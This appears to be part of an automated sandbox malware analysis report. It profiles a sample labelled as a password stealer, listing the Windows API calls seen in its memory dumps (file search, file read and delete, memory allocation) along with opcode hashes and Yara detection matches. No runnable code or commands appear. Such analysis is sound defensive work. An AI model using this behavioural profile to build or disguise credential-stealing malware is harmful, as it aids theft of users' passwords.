                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_1480000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280

                            Execution Graph

                            Execution Coverage:2.6%
                            Dynamic/Decrypted Code Coverage:4.1%
                            Signature Coverage:1.5%
                            Total number of Nodes:469
                            Total number of Limit Nodes:77

                            Control-flow Graph

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "*$#$$$)$*O$3E$4$5$6$8$C$I$KF$Kv$L#$LL$R*$RC$T$Y$a$c$c%$d$hd$l$m$y(${$|$)$D$Y$Y$b
                            • API String ID: 0-444417252
                            • Opcode ID: 14747e5b4fe2305507aff1bb627401417b2b92258512f82c6a40be54baf92688
                            • Instruction ID: f140a483972f2bdc52d88f6b01d7e5b6d8c509de0164fcec650cdb017e8f5e60
                            • Opcode Fuzzy Hash: 14747e5b4fe2305507aff1bb627401417b2b92258512f82c6a40be54baf92688
                            • Instruction Fuzzy Hash: 8F529DB0D15229CBEB65CF44C998BDDBBB1BB69308F1081D9D04D6B280C7B95AD9CF84
                            APIs
                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0322C004
                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0322C03F
                            • FindClose.KERNELBASE(?), ref: 0322C04A
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNext
                            • String ID:
                            • API String ID: 3541575487-0
                            • Opcode ID: 2ec34cec3e2b193c6b078985cb0229c521994dbb78ba7706fda8460e581adf65
                            • Instruction ID: 14343015dfeb08afcdbcfdb769799dbd208ff8228098ef0d4ad76536de0fd14c
                            • Opcode Fuzzy Hash: 2ec34cec3e2b193c6b078985cb0229c521994dbb78ba7706fda8460e581adf65
                            • Instruction Fuzzy Hash: 2631B2B5910318BBDB20DF64CC85FFF777C9B45704F144598BA08AB180EAB1ABD48BA1
                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 03237F13
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ad6615fc420d2807dfd7382b17cb3b391eed67d17bf06f0a23172501b6ccef4a
                            • Instruction ID: 0020577ecc2656b3077370ba459f52022714f7ce32fc2ce39251b2ad7e5d0cd5
                            • Opcode Fuzzy Hash: ad6615fc420d2807dfd7382b17cb3b391eed67d17bf06f0a23172501b6ccef4a
                            • Instruction Fuzzy Hash: 4731D5B5A11209AFDB14DF98D880EDEBBF9AF8D710F108219FD19A7340D770A851CBA4
                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 03238058
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 5c7df527062c3008284fc9738dfa9e5924ad65c566b732b5d860a3d882a059aa
                            • Instruction ID: 8bf6711b231fcd3c5ccfd3dcae3274dc5a191b41fa0b99919cdffc746f42c5f1
                            • Opcode Fuzzy Hash: 5c7df527062c3008284fc9738dfa9e5924ad65c566b732b5d860a3d882a059aa
                            • Instruction Fuzzy Hash: 613109B5A10208AFDB14DF59D880EEFBBF9EF8D714F00850AFD18A7240D770A8518BA0
                            APIs
                            • NtAllocateVirtualMemory.NTDLL(03221A5E,?,03236EB7,00000000,00000004,00003000,?,?,?,?,?,03236EB7,03221A5E,6A574B00,03221A5E,00000000), ref: 032382FD
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: f44f9738fdc4b9d936bb10f860b662b84d53457bdfbc1d8c96dad4ca9a68d16b
                            • Instruction ID: b6c955d7d7c627216fce4804efae08bdc1257cd76b2065bd2d5812152afc8a6e
                            • Opcode Fuzzy Hash: f44f9738fdc4b9d936bb10f860b662b84d53457bdfbc1d8c96dad4ca9a68d16b
                            • Instruction Fuzzy Hash: C1214CB5A10209AFDB14DF58DC41FEFB7B9EF89610F008609FD58AB280D771A851CBA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteFile
                            • String ID:
                            • API String ID: 4033686569-0
                            • Opcode ID: 11925e15ac0903aa953dd580597b0c34f2ceeeb38f974c24de6dd8b2c9a8329d
                            • Instruction ID: e23cb11007d6a9068b468323e25134923086da7cc4b11a486ef239868a8c0ce8
                            • Opcode Fuzzy Hash: 11925e15ac0903aa953dd580597b0c34f2ceeeb38f974c24de6dd8b2c9a8329d
                            • Instruction Fuzzy Hash: D401C0B5A503047BE210EA64DC41FEB77ACDF86610F40844AFA48AB280D7B1B85187E1
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 03238127
                            Memory Dump Source
                            • Source File: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, Offset: 03210000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3210000_netiougc.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 9fde11d416b0d293b7434aa2a4f363c7c1aa4e8899d97a94e070bdcfd642db47
                            • Instruction ID: 876977c4bf2ee690376ca808067fac49f21ba27ef53a399e8b0965e8deb83bf8
                            • Opcode Fuzzy Hash: 9fde11d416b0d293b7434aa2a4f363c7c1aa4e8899d97a94e070bdcfd642db47
                            • Instruction Fuzzy Hash: F0E04F752112047BD510EB59DC40F97776CDBC6A10F404055FA19AB281C6B1B95186B4
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8f37b60601faf41121e428c18f6cdd4092f3b83b4c46b66bb0ac8d55610b7ca0
                            • Instruction ID: b497c409b39782c0c19cf7802a80b108871449dbb0253d0b113d08cc571181a2
                            • Opcode Fuzzy Hash: 8f37b60601faf41121e428c18f6cdd4092f3b83b4c46b66bb0ac8d55610b7ca0
                            • Instruction Fuzzy Hash: F8900231A05804129140B1584884546401997E1301B56C012F0428554C8B188A5A6371
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: edb45978262d225a0c5d4b2aadedfd78e977c2aed279cd991bff93c32c6b5d65
                            • Instruction ID: f66067b2182446210a61d9ed390abb43ef1cd689c684c7186d28ebad516ed9f8
                            • Opcode Fuzzy Hash: edb45978262d225a0c5d4b2aadedfd78e977c2aed279cd991bff93c32c6b5d65
                            • Instruction Fuzzy Hash: 39900261A01504424140B1584804406601997E2301396C116B0558560C871C8959A279
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 15f35391fcf561de47c55f622243b0d1f4bb1942c5d7345c8d7a88bad2c21294
                            • Instruction ID: 24881a29ead5a13114bdf551a84035183a3f2acd90eddc38ed46b2c82a76fa7f
                            • Opcode Fuzzy Hash: 15f35391fcf561de47c55f622243b0d1f4bb1942c5d7345c8d7a88bad2c21294
                            • Instruction Fuzzy Hash: BE900231A0540C02D150B1584414746001987D1301F56C012B0028654D87598B5976B1
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6f57e6e67560088ad8b3a3a5f99fca127875999f7363c03df0d7153c4acf4b87
                            • Instruction ID: 7701bc1a3e215b71177663ae56287bae2a7922e2ba70ed54aac5bb21b7dbf978
                            • Opcode Fuzzy Hash: 6f57e6e67560088ad8b3a3a5f99fca127875999f7363c03df0d7153c4acf4b87
                            • Instruction Fuzzy Hash: C890023160544C42D140B1584404A46002987D1305F56C012B0068694D97298E59B671
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 05ac0543c306b2fec8b3c72c86b704cd1773f6d26f7f5636d0425003b9e62a2d
                            • Instruction ID: 32dc9267c1cee1464dd8fbea7a557ad15c6917cc899b8f9eb6ce4719d1d9ac38
                            • Opcode Fuzzy Hash: 05ac0543c306b2fec8b3c72c86b704cd1773f6d26f7f5636d0425003b9e62a2d
                            • Instruction Fuzzy Hash: 2190023160140C02D180B158440464A001987D2301F96C016B0029654DCB198B5D77B1
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 870353428f7de623ee15902dd136890b31be6e14333508a863d11f711c8103ba
                            • Instruction ID: b5448d2f2b480e41a9d867b7de8c4df2d3990aa48037fed9707e442c153ce833
                            • Opcode Fuzzy Hash: 870353428f7de623ee15902dd136890b31be6e14333508a863d11f711c8103ba
                            • Instruction Fuzzy Hash: D4900261602404034105B1584414616401E87E1301B56C022F1018590DC62989957135
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: dfb0aec2f8f902ed3a1a36a1c2f6e54efc5a375ab4716eaa8f80eb97c586743c
                            • Instruction ID: 04d7cde4cc09291f46f515cd9db9b851eae8f948b928ba83208d9eeb6b41a77c
                            • Opcode Fuzzy Hash: dfb0aec2f8f902ed3a1a36a1c2f6e54efc5a375ab4716eaa8f80eb97c586743c
                            • Instruction Fuzzy Hash: 48900225621404020145F558060450B045997D7351396C016F141A590CC72589696331
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: cde02195ba2b9caa32ccbc50cfe9319275be2da996f36db022eff64c2d0dbe5f
                            • Instruction ID: 160b23867833ea9e9b2e9ae16dc475add611ac13b3cdecc0bd8e7719926032fb
                            • Opcode Fuzzy Hash: cde02195ba2b9caa32ccbc50cfe9319275be2da996f36db022eff64c2d0dbe5f
                            • Instruction Fuzzy Hash: F5900435711404030105F55C0704507005FC7D7351357C033F101D550CD735CD757131
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e7a6ca55d24d13ac8c2ea9d38a8510cb334aa5180638d1697469b847064a710a
                            • Instruction ID: 5cb53d7a635adf5297e32449c69f67bcf1934c6cd8a0222a88a499e86e8862f2
                            • Opcode Fuzzy Hash: e7a6ca55d24d13ac8c2ea9d38a8510cb334aa5180638d1697469b847064a710a
                            • Instruction Fuzzy Hash: B7900221A01404424140B16888449064019ABE2311756C122B099C550D865D89696675
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 656d6e4b79feb72d88094e07fa6d1bb43e1ab87f429e4b8c62b084c96abbbf7f
                            • Instruction ID: dabff02c4a5b7c743aaa791b9724e0cc69becfe8d80e50b4a46a5121cdae732a
                            • Opcode Fuzzy Hash: 656d6e4b79feb72d88094e07fa6d1bb43e1ab87f429e4b8c62b084c96abbbf7f
                            • Instruction Fuzzy Hash: E3900221611C0442D200B5684C14B07001987D1303F56C116B0158554CCA1989656531
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 70c2f5741dd8e597bebea6a55a39ebd2ad9a69662b69c49bf4ebe3dfbed0b892
                            • Instruction ID: f01cc42c3d3bf3d091d7b03e18c22b976e4862073b1111d282b2f8719dadb2a3
                            • Opcode Fuzzy Hash: 70c2f5741dd8e597bebea6a55a39ebd2ad9a69662b69c49bf4ebe3dfbed0b892
                            • Instruction Fuzzy Hash: 2E90026174140842D100B1584414B060019C7E2301F56C016F1068554D871DCD567136
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: f6608f4fda7de311236960e6939e2def79b2bddfe2c64e76c433520b7a55c882
                            • Instruction ID: d26e106fcbad2356c31381a478330caaa3917a322029464899d4129c7f16448d
                            • Opcode Fuzzy Hash: f6608f4fda7de311236960e6939e2def79b2bddfe2c64e76c433520b7a55c882
                            • Instruction Fuzzy Hash: CC900221A0140902D101B1584404616001E87D1341F96C023B1028555ECB298A96B131
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4e0571dbc8a8faa2958864561e8b9f7e4554c55889dca9e62bb35280ca4fdcf4
                            • Instruction ID: 55cc70177defbae5002091543cb57f95dd36bdab7d89d28b182f50552c5702a9
                            • Opcode Fuzzy Hash: 4e0571dbc8a8faa2958864561e8b9f7e4554c55889dca9e62bb35280ca4fdcf4
                            • Instruction Fuzzy Hash: 4B90026160180803D140B5584804607001987D1302F56C012B2068555E8B2D8D557135
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9367b3d3d4a598f4d14b85255975a4ffd7bc0d1abcce8d13b13356fdaea6df8e
                            • Instruction ID: b515fa97c37d72de4896e231ffd9489a0dcdbc2010d9ec4e78e93155ec949f1e
                            • Opcode Fuzzy Hash: 9367b3d3d4a598f4d14b85255975a4ffd7bc0d1abcce8d13b13356fdaea6df8e
                            • Instruction Fuzzy Hash: EF90023160140813D111B1584504707001D87D1341F96C413B0428558D975A8A56B131
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: a431b2e0f67ceff4be5aefb423c6c83b51ae5ab10d5c43775a1536bd8ef86b4c
                            • Instruction ID: 8a10398ac9ca821f945252797e3f30fd044cc9f90e93992ba603ef6a40c34c73
                            • Opcode Fuzzy Hash: a431b2e0f67ceff4be5aefb423c6c83b51ae5ab10d5c43775a1536bd8ef86b4c
                            • Instruction Fuzzy Hash: AB900221642445525545F1584404507401A97E1341796C013B1418950C862A995AE631
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e00ff7a8aeaec0958ce9bd2397135aeeffe18228addee51582320120782dc5f6
                            • Instruction ID: ae99986848abeda56b08a626d5b1f512bb3b1f8113b2611f7874c5b55edda665
                            • Opcode Fuzzy Hash: e00ff7a8aeaec0958ce9bd2397135aeeffe18228addee51582320120782dc5f6
                            • Instruction Fuzzy Hash: 7590022170140403D140B15854186064019D7E2301F56D012F0418554CDA19895A6232
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 5f405398f90fec768416acd4e7f7fc7f4c9911051805be5216f0e0335cd84d39
                            • Instruction ID: 59f2459af9d0ce7941dc0a847c84029aa8cb8278c9e47df1c05ac029664a8e84
                            • Opcode Fuzzy Hash: 5f405398f90fec768416acd4e7f7fc7f4c9911051805be5216f0e0335cd84d39
                            • Instruction Fuzzy Hash: 7390022961340402D180B158540860A001987D2302F96D416B0019558CCA19896D6331
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 317372b83986aab63e65508402916ef39d32d8a809a50d776e8b13e53e4958b9
                            • Instruction ID: 3afda048a7ae5aaa6962d36ab954ec20e096ef8d8befaf2d0e1987df40ef8cb1
                            • Opcode Fuzzy Hash: 317372b83986aab63e65508402916ef39d32d8a809a50d776e8b13e53e4958b9
                            • Instruction Fuzzy Hash: 8790023160140802D100B5985408646001987E1301F56D012B5028555EC76989957131
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: b049b6c20d6f09c134c97145dc6449d76b12e6dcc6cdf70873d5d5136a6579b5
                            • Instruction ID: f53f36c65b30445c8f2d8ca326fbf93a6616a82bbe0b5bb3af65a7101c9d6676
                            • Opcode Fuzzy Hash: b049b6c20d6f09c134c97145dc6449d76b12e6dcc6cdf70873d5d5136a6579b5
                            • Instruction Fuzzy Hash: 0C90023160140C42D100B1584404B46001987E1301F56C017B0128654D8719C9557531
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039B0000, based on PE: true
                            • Associated: 00000007.00000002.2906315071.0000000003AD9000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003ADD000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_39b0000_netiougc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8fcbf58f6c4f89fc1980278b380e3cf74bb17f7b11abd897256737f072135cc0
                            • Instruction ID: 28144438e214a90f86187628eb02b6f9f76018e8364e88c36b927e5abbcbe3e4
                            • Opcode Fuzzy Hash: 8fcbf58f6c4f89fc1980278b380e3cf74bb17f7b11abd897256737f072135cc0
                            • Instruction Fuzzy Hash: F490023160148C02D110B158840474A001987D1301F5AC412B4428658D879989957131
                            APIs
